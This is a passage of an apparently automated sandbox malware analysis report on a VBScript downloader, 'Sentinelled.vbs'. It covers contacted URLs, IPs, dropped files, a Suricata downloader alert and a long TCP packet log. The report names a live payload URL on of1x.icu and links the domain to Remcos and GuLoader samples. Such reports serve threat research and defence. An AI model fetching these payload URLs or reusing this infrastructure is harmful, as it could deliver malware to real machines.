https://of1x.icu/YkHfhYCF/gliadines.pfbP	powershell.exe, 00000002.00000002.1743791119.000001CB8C366000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://i.ytimg.com/vi/7rUYHhQHcI4/frame0.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://i.ytimg.com/vi/885Jhvh-Z-I/frame0.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C446000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://of1x.icu/YkHf	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://i.ytimg.com/vi/oHg5SJYRHA0/hqdefault.jpg	powershell.exe, 00000002.00000002.1768862468.000001CB9C1AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1768862468.000001CB9C150000.00000004.00000800.00020000.00000000.sdmp, Unmidwifed.Sur.2.dr	false	high
https://of1x.icu/YkHfhYCF	powershell.exe, 00000002.00000002.1743791119.000001CB8D4DA000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://of1x.icu	powershell.exe, 00000002.00000002.1743791119.000001CB8DF78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1743791119.000001CB8DDF5000.00000004.00000800.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.86.72	of1x.icu	United States		13335	CLOUDFLARENETUS	false
142.250.181.110	youtube-ui.l.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579017
Start date and time:	2024-12-20 17:40:55 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Sentinelled.vbs
Detection:	MAL
Classification:	mal100.expl.evad.winVBS@4/5@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 12 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .vbs Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2104 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Sentinelled.vbs

Simulations

Behavior and APIs

Time	Type	Description
11:42:24	API Interceptor	95x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.86.72	Brooming.vbs	Get hash	malicious	Remcos, GuLoader	Browse
104.21.86.72	Reqt 83291.vbs	Get hash	malicious	Remcos, GuLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
of1x.icu	Brooming.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.21.86.72
	Strait STS.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.216.143
	Reqt 83291.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.21.86.72

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	nshkarm.elf	Get hash	malicious	Mirai	Browse	104.25.87.101
	hBBxlxfQ3F.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.197.170
	gf3yK6i4OX.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	0WO49yZcDA.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	uDTW3VjJJT.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.21.99
	u1z7S3hr06.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.21.99
	zhQFKte2vX.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	http://www.eventcreate.com/e/you-have-received-a-new-doc	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	ddySsHnC6l.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	NAliwxUTJ4.exe	Get hash	malicious	LummaC	Browse	104.21.21.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta	Get hash	malicious	Cobalt Strike	Browse	142.250.181.110 104.21.86.72
	QUOTATION#008792.exe	Get hash	malicious	AgentTesla	Browse	142.250.181.110 104.21.86.72
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	142.250.181.110 104.21.86.72
	https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment	Get hash	malicious	HTMLPhisher	Browse	142.250.181.110 104.21.86.72
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	142.250.181.110 104.21.86.72
	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse	142.250.181.110 104.21.86.72
	https://kubota.highq.com/kubota/externalAccess.action?linkParam=248Md4JKaxiIU4vwlQaNq5FLgPVNq03doY6pcXaLJD4%3D&documentDownload=link	Get hash	malicious	Unknown	Browse	142.250.181.110 104.21.86.72
	https://kubota.highq.com/kubota/viewUserProfile.action?metaData.encryptTargetUserID=D1l4_GI3rHw=&metaData.updateUserProfileProcess=true	Get hash	malicious	Unknown	Browse	142.250.181.110 104.21.86.72
	https://track.samsupport.jmsend.com/z.z?l=aHR0cHM6Ly9zYW1zdXBwb3J0cy1jb20uam1haWxyb3V0ZS5uZXQveC91P3U9ZWJlNTI4YmMtYTNjMS00NjI0LWFmZjEtYzcwNDJmMjczZWIw&r=14771356625&d=20437066&p=1&t=h&h=40dfe9be3647ce867f619b07dd91c655	Get hash	malicious	Unknown	Browse	142.250.181.110 104.21.86.72

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11608
Entropy (8bit):	4.890472898059848
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5:	8A4B02D8A977CB929C05D4BC2942C5A9
SHA1:	F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256:	624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512:	38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulbnolz:NllUc
MD5:	F23953D4A58E404FCB67ADD0C45EB27A
SHA1:	2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:	B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cslfufb2.vxd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1pd4hdj.u2l.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Unmidwifed.Sur

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	HTML document, ASCII text, with very long lines (56553)
Category:	dropped
Size (bytes):	1064493
Entropy (8bit):	5.624419118414064
Encrypted:	false
SSDEEP:	12288:MSBDBHBuBvBSBQBuBLBdBSagsDIwWqSq4Vwege5DA:MVhsd
MD5:	EFDEEA5B28B719FFAFA8C09A157E8E4B
SHA1:	25D80AD1D6AFEBDD546F1C3F67271D29B926AD97
SHA-256:	AFFF350691D659349E53D3AB6B05EE444658E4307D587418E61A8A80DAD7F02C
SHA-512:	8EA8C0DA34CF80822487D3B82744750F4F63477CA1761FD668F960D3195F28261222541964C73CAE9F3B8B055F0F7C6451975AF082AAF7DB8E8DA4AC09CD28E9
Malicious:	false
Preview:	<!DOCTYPE html><html style="font-size: 10px;font-family: Roboto, Arial, sans-serif;" lang="en" darker-dark-theme darker-dark-theme-deprecate system-icons typography typography-spacing refresh><head><script data-id="_gd" nonce="nAc2EUZbnz1lwNgXJC1-PA">window.WIZ_global_data = {"MUE6Ne":"youtube_web","MuJWjd":false,"UUFaWc":"%.@.null,1000,2]","cfb2h":"youtube.web-front-end-critical_20241218.08_p0","fPDxwd":[],"iCzhFc":false,"nQyAE":{},"oxN3nb":{"1":false,"0":false,"610401301":false,"899588437":false,"188588736":true,"651175828":false,"653718497":false,"660014094":false},"u4g7r":"%.@.null,1000,2]","xnI9P":true,"xwAfE":true,"yFnxrf":2486};</script><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta http-equiv="origin-trial" content="ApvK67ociHgr2egd6c2ZjrfPuRs8BHcvSggogIOPQNH7GJ3cVlyJ1NOq/COCdj0+zxskqHt9HgLLETc8qqD+vwsAAABteyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJQcml2YWN5U2FuZGJveEFkc0FQSXMiLCJleHBpcnkiOjE2OTUxNjc5OTksImlzU3ViZG9tYWluIjp0cnVlfQ=="/><script no

Static File Info

General

File type:	ASCII text, with very long lines (350), with CRLF line terminators
Entropy (8bit):	5.008757798809921
TrID:
File name:	Sentinelled.vbs
File size:	47'581 bytes
MD5:	b87b7f3da5d689399aa07d096ecda9bd
SHA1:	e07130e94480c9e9410a10c5a2cbaf05fd25bf99
SHA256:	1614ed95576305a4ebdc5dc8e3fdb09d5c48186f07388246363e1d23862b7bb3
SHA512:	f27669ced62a7eea1ef1604e8c9effb6c7e0a2339eca021eb47a5b01dfab9abec41820378a3ffc1c0cc0688ffc527bdeab01a6061d404e7d14b0ead6b4a2f7b4
SSDEEP:	768:T3jUU5URa4etFTI5HEz5+iYJtIX1vjAjAgfkTGRGFrcI8Z9MhA3oayKFgS:TzU8eUTI5kQiYmcskUPF4KAmAJ
TLSH:	37231A67FF1406574E8A275DF9645F52C9B8D540852378F1FEEC138EA00A8ACE3BD21A
File Content Preview:	..'hyphenation! attraperedes; phellum,..'Koghedt goombah. turntail, teoretisafr...'Oversupplied swayers pelsjgernes nonmoderateness;..'Trkkanals listigstes, lymphosarcomas: headachier?..'Nave, egrets?....'Hyggespreders, respelled..'Unexcitableness! supers

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-20T17:42:35.967540+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49702	104.21.86.72	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 17:42:27.594377041 CET	49701	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:27.594429016 CET	443	49701	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:27.594499111 CET	49701	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:27.601769924 CET	49701	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:27.601794958 CET	443	49701	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:28.827106953 CET	443	49701	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:28.827218056 CET	49701	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:28.846631050 CET	49701	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:28.846669912 CET	443	49701	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:28.847773075 CET	443	49701	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:28.899782896 CET	49701	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:28.925765038 CET	49701	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:28.971360922 CET	443	49701	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:29.642700911 CET	443	49701	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:29.642788887 CET	443	49701	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:29.642910004 CET	49701	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:29.647044897 CET	49701	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:34.047281981 CET	49702	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:34.047317028 CET	443	49702	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:34.047406912 CET	49702	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:34.047682047 CET	49702	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:34.047694921 CET	443	49702	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:35.266773939 CET	443	49702	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:35.269610882 CET	49702	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:35.269639969 CET	443	49702	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:35.967556000 CET	443	49702	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:35.967689991 CET	443	49702	104.21.86.72	192.168.2.7
Dec 20, 2024 17:42:35.967770100 CET	49702	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:35.968173981 CET	49702	443	192.168.2.7	104.21.86.72
Dec 20, 2024 17:42:35.968674898 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:35.968738079 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:35.968827963 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:35.969110012 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:35.969132900 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:37.681046963 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:37.681180000 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:37.682162046 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:37.682225943 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:37.710784912 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:37.710865021 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:37.711251974 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:37.726457119 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:37.771342993 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.514619112 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.514755011 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.514812946 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.514833927 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.521823883 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.521907091 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.521917105 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.529117107 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.529179096 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.529190063 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.537472963 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.537558079 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.537569046 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.539762974 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.539823055 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.539840937 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.577419996 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.577538967 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.577552080 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.618721962 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.618733883 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.665409088 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.665433884 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.703210115 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.703286886 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.703357935 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.709469080 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.709536076 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.709558010 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.719870090 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.719952106 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.719986916 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.736442089 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.736550093 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.736563921 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.758547068 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.758760929 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.758801937 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.764271021 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.764344931 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.764369011 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.773946047 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.774025917 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.774074078 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.788631916 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.788741112 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.788784027 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.801096916 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.801181078 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.801212072 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.814085007 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.814172983 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.814188004 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.814204931 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.814244032 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.827379942 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.840699911 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.840740919 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.840780020 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.840814114 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.840894938 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.853853941 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.891422033 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.891485929 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.891597033 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.891629934 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.891751051 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.895417929 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.904022932 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.904109955 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.904120922 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.914944887 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.914987087 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.915000916 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.915024996 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.915064096 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.925678968 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.936712980 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.936785936 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.936794043 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.936846018 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.936906099 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.946034908 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.955564022 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.955621004 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.955632925 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.971570015 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.971641064 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.971657991 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.980740070 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.980815887 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.980823040 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.980839968 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.980909109 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.987575054 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.992671967 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.992724895 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:38.992736101 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.992748976 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:38.992801905 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:39.001246929 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.011070013 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.011142015 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.011152983 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:39.011174917 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.011230946 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:39.017493010 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.025456905 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.025522947 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:39.025542974 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.041534901 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.041616917 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:39.041635036 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.044053078 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.044091940 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.044125080 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:39.044152975 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.044202089 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:39.064639091 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.064821959 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.064857006 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.064886093 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:39.064907074 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.064956903 CET	49704	443	192.168.2.7	142.250.181.110
Dec 20, 2024 17:42:39.065010071 CET	443	49704	142.250.181.110	192.168.2.7
Dec 20, 2024 17:42:39.069369078 CET	443	49704	142.250.181.110	192.168.2.7
